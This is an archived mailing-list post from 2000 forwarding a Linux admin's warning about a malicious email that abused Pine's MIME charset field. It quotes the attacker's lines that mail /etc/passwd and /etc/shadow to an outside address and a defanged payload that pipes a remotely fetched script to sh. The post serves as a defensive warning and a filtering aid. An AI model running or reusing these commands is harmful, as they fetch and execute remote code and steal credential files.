Complete.Org: Mailing Lists: Archives: discussion: May 2000:
[aclug-L] FW: URGENT!!!!!!! Pine hacking attack: DOS attack, log file
Home

[aclug-L] FW: URGENT!!!!!!! Pine hacking attack: DOS attack, log file

[Top] [All Lists]

[Date Prev][Date Next][Thread Prev][Thread Next][Date Index] [Thread Index]
To: <discussion@xxxxxxxxx>
Subject: [aclug-L] FW: URGENT!!!!!!! Pine hacking attack: DOS attack, log file attached!(fwd)
From: "Dale W Hodge" <dwh@xxxxxxxxxxxxxxxx>
Date: Thu, 18 May 2000 13:45:18 -0500
Reply-to: discussion@xxxxxxxxx

Here's the first of the messages about the Pine Exploit.

-----Original Message-----
From: owner-linux-admin@xxxxxxxxxxxxxxxx
[mailto:owner-linux-admin@xxxxxxxxxxxxxxxx] On Behalf Of Jim Roland
Sent: Tuesday, May 16, 2000 2:49 AM
To: linux-net@xxxxxxxxxxxxxxxx; linux-admin@xxxxxxxxxxxxxxxx;
linux-newbie@xxxxxxxxxxxxxxxx
Subject: URGENT!!!!!!! Pine hacking attack: DOS attack, log file
attached!(fwd)


(I've BCC'd several people I personally know that could find this
information useful).

I'm sure some of you might have been hit with something like this, but
this is the first time that in my 3 years of using Pine, has Pine been
used to attempt to hack into my system.  This is a little too scary, and a
little too close to similar attacks against Microsoft email software.

For everyone's sake, I hope it was just me that was attacked, but it
appears that the person who sent out the message used to attack, put
addresses in the BCC field, which probably spammed several people.  If you
receive a message with "DOS attack, log file attached!" and you're on Unix
or Linux, DO NOT, I REPEAT, DO NOT OPEN the message.  I'm not speaking
like the media press that says "do not open the message" when they really
mean to say "do not open the attachment", this type of attack using *nix
systems (Linux, etc) literally to start running a program while a message
is being looked over for attachments via Pine.  If you open the message to
view the headers or body, IT'S TOO LATE!

Like a good admin, I thought this was a real message, and wanted to find
out what was going on.  I was too tired to be suspicious that the from and
to address never contained anything from my domain name.  Unfortunately,
Pine does not show the "To" address, and thinking it was sent to my "root"
or one of the "*master" accounts (why the "+" does not show up in front of
the message--I have admin accounts forwarded to my user-level account), I
opened it.

---------------------------

For those of you experienced, please do not get frustrated, I want to make
this serve as a warning to newbies about properly using Linux and
unknowingly sending out their passwords to a 3rd party.  Therefore, I
might be a little less-advanced in explanations in here, but I do not want
anyone to get nailed like I did.  The message quoted below was used to
attempt to steal passwords from my system.  Yes, that's right, the message
below (changed to make it harmless while you read this warning) was used
to attempt to steal passwords from my system from inside Pine.

Please forgive this message if it appears to be a little off-topic and a
little panic, I want to save someone from being hacked into like I ALMOST
was (they would have gotten the "keys" to my system if I didn't use some
common sense and the command line (tools like kill, killall, ps, and so
on).  Newbies:  Sometimes, there is NO substitute for the command-line.
GUI tools are great for learning about the system, but some things you
need the command line for.  Please do not hesitate to use this listserv as
a help resource.

Let me preface this first (especially for you new to linux), with
the phrase that all linux books and installation manuals tell you:
NEVER, NEVER, NEVER use your admin account (root) to do ANY user functions
on the system, including reading mail.  Newbies:  Don't be scared by this,
Linux is a great system, and actually is more secure and (at the moment),
immune to most viruses like the ILOVEYOU that floated around.

Fortunately for me, I actually go by this rule.  Folks new to Linux might
not necessarily follow that rule to the letter.  Please, do listen, there
is credence to why you're told to do that.

Now for the meaty stuff.

Like any good admin, when the system is installed, not only are you
prompted (or required) to password your "root" account (which has rights
to everything on the system), but you are prompted to create a user-level
account as well.  ALWAYS use this user-level account to do everything on
the system, including reading email.

Those who think Pine is immune to being attacked or being used to attack,
are gravely mistaken.  (Pine is a command-line email program that, can't
be used to run things like .vbs files, or other document viruses).

I had a rude awakening this evening just before turning in for the night.
I was just going to peek at my mail account to clean out any topics from
the listservs that didn't interest me, when I came across the message
quoted below.  (DOS=Denial of Service).  It indicated that my system had
been used to launch a denial of service attack.  Of course it was false,
however it took forever to open the message, and I eventually had to
log-in from another telnet session as root to kill pine, and other
programs that made the drive go nuts.

I became instinctively suspicious when a 12k message, which
should take 1-2 seconds to open was taking a lot longer to
open.

Apparently, what was going on behind the scenes was very sinister.

I could never open the message body, nor the attached file, so I saved
the message to a mail folder (typically in the mail
directory) that I created like "temp".  Exiting Pine, I did a "cd mail"
where my Pine mail folders are kept (each folder is one message appended
to another in a standard text file).  I did a "less" on the mail folder and
discovered what actually occurred:

1) Masquerading as an attachment (this apparently only works with
pine--Microsoft mail programs would be immune to this and would see
jibberish (MIME encoded b.s.) and a log file showing IP addresses that are
not even part of their (or mine) network), the MIME field called "charset"
was used to launch an attack against the system.

2) The attack was simply to launch a text-based web browser (lynx), pull
down the source code of a C++ program called "io" that froze my system
(actually slowed it down).

3) The program (io), is downloaded, stored in /tmp/io, is compiled,
and run.  All in the background, hiding the compiler (gcc) pipes to shell
(sh or bash) from being seen by the ps command.  I did manage to kill the
parent process (sh) and killed the attempt, but mail logs show it was too
late (fortunately he did not get much from my system but "permission
denied" messages).

4) The "io" program's purpose was to email my /etc/passwd and
/etc/shadow files to an email account (bjern3@xxxxxxxxxxxxx), along with
my hostname, IP address, etc.

** Step #4 is where the golden rule (Never use "root" to do ANY user
functions), comes into play.

----------------------

Had I been logged into my system as root, this cracker would have been
able to steal my passwords file (shadow).  A properly configured
/etc/shadow file should only have rights to be read by root ("ls -la
/etc/shadow" gives this output):
-rw-------   1 root     root         3929 Apr 23 14:06 /etc/shadow

This means that no other user accounts on a system can read this file
directly.  Newer Linux Distributions put their passwords in /etc/shadow.
Older Linux Distributions put passwords in /etc/passwd, which can be read
(maybe not written) by any id on the system.

The attack I received, emails both files to that attglobal.net mail
account.  The best this guy gets is a list of a couple of accounts on a
system, of which most are already disabled anyway.  All he got was my IP
address, user id numbers, and a "permission denied" instead of my
/etc/shadow file.


I managed to (from looking at the raw text of the mail message from
outside of Pine), locate exactly where this program comes from.  It was
read by Lynx, piped to sh (which compiled and ran the program) then
exited, never showing the mail message.

I've already notified attglobal.net, tofan.onza.net's ISP, and the relay
host that was used to send this message out (from the Netherlands).  If
you're attacked, contact these folks as well.  Shut this idiot down.
Hopefully it's someone in the US, so that the FBI can nail them.

The sources:

attglobal.net   =       mail account that receives the passwords, and IPs
fontijne.nl     =       source of the message relayed to and spoofing the
                                onza.net domain.  Likely the source of
                                useractive's hijacking, if they were
                                hijacked.  Microsoft Exchange used to
                                send the message out.
tofan.onza.net  =       a system hosting the source code of the password
                                stealing program.
useractive.net  =       either ISP knowingly hosting the onza.net attack
                                source code, or was hijacked by someone
savvis.net      =       useractive's upstream provider (useractive's ISP)
wcom.net        =       A dialup pool on Worldcom's Chicago POP that was
                                used to spam via a Netherlands mail server
                                (IP and host can be seen in the mail
                                 header below)

Both the "onza" and "useractive" systems are in Champaign, IL


I've notified attglobal.net's abuse center, called useractive and
savvis.net (I'm suspicious of useractive, but called them anyway), and
was thinking of calling the FBI's computer crimes division.

------------------------------------

The program's source code (for security reasons, and so that I don't send 
to a potential cracker, I will only post the lines that do the actual
stealing...I have no idea (yet) what the rest of the program does):

mail -s hhp-pine000 bjern3@xxxxxxxxxxxxx 2>/dev/null < /etc/passwd
echo "`hostname -i` - `id` - `cat /etc/shadow 2>&1`" | mail -s hhp-pine 
bjern3@xxxxxxxxxxxxx 2>/dev/null


------------------------------------

As you can see, he's creative, but did not cover his tracks very well.
The initial message was bounced off of a mail server in The
Netherlands, from a Chicago dialup account on MCI/Worldcom.


I apologize for the length, but I wanted to make sure I warned those on
the "newbie" list who might not realize what's going on, especially those
with DSL or Cable modems that might have a static IP address and leave
their system on all the time.



Lastly, below is the evil mail message.  I've snipped out the MIME encoded
data, which doesn't appear to be a real attachment, however, the "evil" is
contained in a [disabled] "charset=" field.  I changed the Pipe symbols to
an underscore (_) so that they will not harm your system.

The file actually contains 2 attachments as far as Pine is concerned.  The
2nd does the damage, the 1st is to provide a "front" if it's a
non-Pine mail client.  The "front" contains a log snippet, maybe real,
maybe not. To prevent this message from being longer than necessary, I
will not include it, just the MIME headers to filter out (maybe with
procmail, or sendmail)--look for "charset" as noted below with the hash
(#) in front, and filter out the content of that field, so your mail users
do not get hit with this attack.  The "attached log file" is merely a list
of ip-deny messages via syslog.  The IPs in the log appear to be fake or
dial-up IPs.

Good luck.
JR


---------- Forwarded message ----------
Return-Path: <root@xxxxxxxxxxxxxx>
Received: from mars.fontijne.nl (smtp.fontijne.nl [195.7.212.130])
        by (host removed) with ESMTP id RAA24494
        for (address removed); Mon, 15 May 2000 17:01:11 -0500
Received: from Bastion.Fontijne.nl (195.7.212.131 [195.7.212.131]) by
    mars.fontijne.nl with SMTP (Microsoft Exchange Internet Mail Service
    Version 5.5.2650.21) id K69W8L9Q; Tue, 16 May 2000 00:01:02 +0200
Received: from chi-qbu-nva-vty3.as.wcom.net ([216.192.161.3]) by
    Bastion.Fontijne.nl; Mon, 15 May 2000 23:54:04 +0000 (GMT)
Message-ID: <Pine.LNX.4.10.9909171428170.28464-100000@xxxxxxxxxxxxxx>
Date: Sat, 13 May 2000 21:15:05 -0400 (EDT)
From: root <root@xxxxxxxxxxxxxx>
Subject: DOS attack, log file attached!
MIME-Version: 1.0
To: root@xxxxxxxxxxxxxx

THIS IS TO INFORM YOU THAT A DOS ATTACK WAS LOGGED ON A
SECURITIES AND EXCHANGE COMMISION INTERNET FIREWALL 
FROM YOUR DOMAIN.
AN EXCERPT FROM OUR LOGS IS ATTACHED BELOW.
ALL TIMES ARE US EASTERN AND ARE SYNCED WITH NTP.

Jerry Leininser
cops@xxxxxxxxxxxxxx

---2463811839-1047689522-958180505=:1450
Content-Type: APPLICATION/octet-stream; name="log.txt.tofan.onza.net.exit"
Content-Transfer-Encoding: BASE64
Content-ID: <Pine.LNX.4.10.1000512211505.1450B@xxxxxxxxxxxxxx>
Content-Description:

[MIME data snipped out]


[MIME header for attachment #2, the MIME header and "charset" field have
been disabled; Pipe symbols (|) that launch the damage have been changed
to underscore symbols (_) to avoid any damage to your system]

#---1463811839-1047689522-958180505=:1450
#Content-Type: TEXT/PLAIN;
#charset=
#charset's contents: "lynx${IFS}-source${IFS}tofan.onza.net_sh_exit"

#name="log" name="emailf" Content-Transfer-Encoding: BASE64
#Content-Description: THE LOGS
#Content-Disposition: attachment; filename="emailf"








PLEASE FORGIVE US IF YOUR SYSTEM WAS ERRORNEOUSLY ACUSED,
WE HAVE FACED A KERNEL PANIC!

Sep 16 17:29:21 secfw3 kernel: IP fw-in deny eth1 TCP 209.16.136.144:1371 \
              206.121.213.44:8080 L=60 S=0x00 I=63749 F=0x0040 T=55 .S....
Sep 16 17:29:24 secfw3 kernel: IP fw-in deny eth1 TCP 209.16.136.144:1371 \
              206.121.213.44:8080 L=60 S=0x00 I=63928 F=0x0040 T=55 .S....
Sep 16 17:29:30 secfw3 kernel: IP fw-in deny eth1 TCP 209.16.136.144:1371 \
              206.121.213.44:8080 L=60 S=0x00 I=64281 F=0x0040 T=55 .S....
Sep 16 17:29:42 secfw3 kernel: IP fw-in deny eth1 TCP 209.16.136.144:1371 \
              206.121.213.44:8080 L=60 S=0x00 I=64978 F=0x0040 T=55 .S....
Sep 16 17:29:45 secfw3 kernel: IP fw-in deny eth1 TCP 209.16.136.144:1389 \
              206.121.213.44:8080 L=60 S=0x00 I=65097 F=0x0040 T=55 .S....
Sep 16 17:29:48 secfw3 kernel: IP fw-in deny eth1 TCP 209.16.136.144:1389 \
              206.121.213.44:8080 L=60 S=0x00 I=65205 F=0x0040 T=55 .S....
Sep 16 17:29:54 secfw3 kernel: IP fw-in deny eth1 TCP 209.16.136.144:1389 \
              206.121.213.44:8080 L=60 S=0x00 I=22 F=0x0040 T=55 .S....
Sep 16 17:30:05 secfw3 kernel: IP fw-in deny eth1 TCP 209.16.136.144:1412 \
              206.121.213.44:8080 L=60 S=0x00 I=775 F=0x0040 T=55 .S....
Sep 16 17:30:06 secfw3 kernel: IP fw-in deny eth1 TCP 209.16.136.144:1371 \
              206.121.213.44:8080 L=60 S=0x00 I=787 F=0x0040 T=55 .S....
Sep 16 17:30:11 secfw3 kernel: IP fw-in deny eth1 TCP 209.16.136.144:1412 \
              206.121.213.44:8080 L=60 S=0x00 I=1014 F=0x0040 T=55 .S....
Sep 16 17:30:21 secfw3 kernel: IP fw-in deny eth1 TCP 209.16.136.144:1423 \
              206.121.213.44:8080 L=60 S=0x00 I=1438 F=0x0040 T=55 .S....


We hope you will take appropriate actions!


[Added]
------------end of 2nd attachment----------------


Good luck in filtering this out!



-- Attached file included as plaintext by Listar --
-- File: .txt

#charset=
#lynx${IFS}-source${IFS}tofan.onza.net:sh:exit

#name="log" name="emailf" Content-Transfer-Encoding: BASE64
#Content-Description: THE LOGS
#Content-Disposition: attachment; filename="emailf"








PLEASE FORGIVE US IF YOUR SYSTEM WAS ERRORNEOUSLY ACUSED,
WE HAVE FACED A KERNEL PANIC!

Sep 16 17:29:21 secfw3 kernel: IP fw-in deny eth1 TCP 209.16.136.144:1371 \
              206.121.213.44:8080 L=60 S=0x00 I=63749 F=0x0040 T=55 .S....
Sep 16 17:29:24 secfw3 kernel: IP fw-in deny eth1 TCP 209.16.136.144:1371 \
              206.121.213.44:8080 L=60 S=0x00 I=63928 F=0x0040 T=55 .S....
Sep 16 17:29:30 secfw3 kernel: IP fw-in deny eth1 TCP 209.16.136.144:1371 \
              206.121.213.44:8080 L=60 S=0x00 I=64281 F=0x0040 T=55 .S....
Sep 16 17:29:42 secfw3 kernel: IP fw-in deny eth1 TCP 209.16.136.144:1371 \
              206.121.213.44:8080 L=60 S=0x00 I=64978 F=0x0040 T=55 .S....
Sep 16 17:29:45 secfw3 kernel: IP fw-in deny eth1 TCP 209.16.136.144:1389 \
              206.121.213.44:8080 L=60 S=0x00 I=65097 F=0x0040 T=55 .S....
Sep 16 17:29:48 secfw3 kernel: IP fw-in deny eth1 TCP 209.16.136.144:1389 \
              206.121.213.44:8080 L=60 S=0x00 I=65205 F=0x0040 T=55 .S....
Sep 16 17:29:54 secfw3 kernel: IP fw-in deny eth1 TCP 209.16.136.144:1389 \
              206.121.213.44:8080 L=60 S=0x00 I=22 F=0x0040 T=55 .S....
Sep 16 17:30:05 secfw3 kernel: IP fw-in deny eth1 TCP 209.16.136.144:1412 \
              206.121.213.44:8080 L=60 S=0x00 I=775 F=0x0040 T=55 .S....
Sep 16 17:30:06 secfw3 kernel: IP fw-in deny eth1 TCP 209.16.136.144:1371 \
              206.121.213.44:8080 L=60 S=0x00 I=787 F=0x0040 T=55 .S....
Sep 16 17:30:11 secfw3 kernel: IP fw-in deny eth1 TCP 209.16.136.144:1412 \
              206.121.213.44:8080 L=60 S=0x00 I=1014 F=0x0040 T=55 .S....
Sep 16 17:30:21 secfw3 kernel: IP fw-in deny eth1 TCP 209.16.136.144:1423 \
              206.121.213.44:8080 L=60 S=0x00 I=1438 F=0x0040 T=55 .S....


We hope you will take appropriate actions!


-- This is the discussion@xxxxxxxxx list.  To unsubscribe,
visit http://tmp2.complete.org/cgi-bin/listargate-aclug.cgi


[Prev in Thread] Current Thread [Next in Thread]
  • [aclug-L] FW: URGENT!!!!!!! Pine hacking attack: DOS attack, log file attached!(fwd), Dale W Hodge <=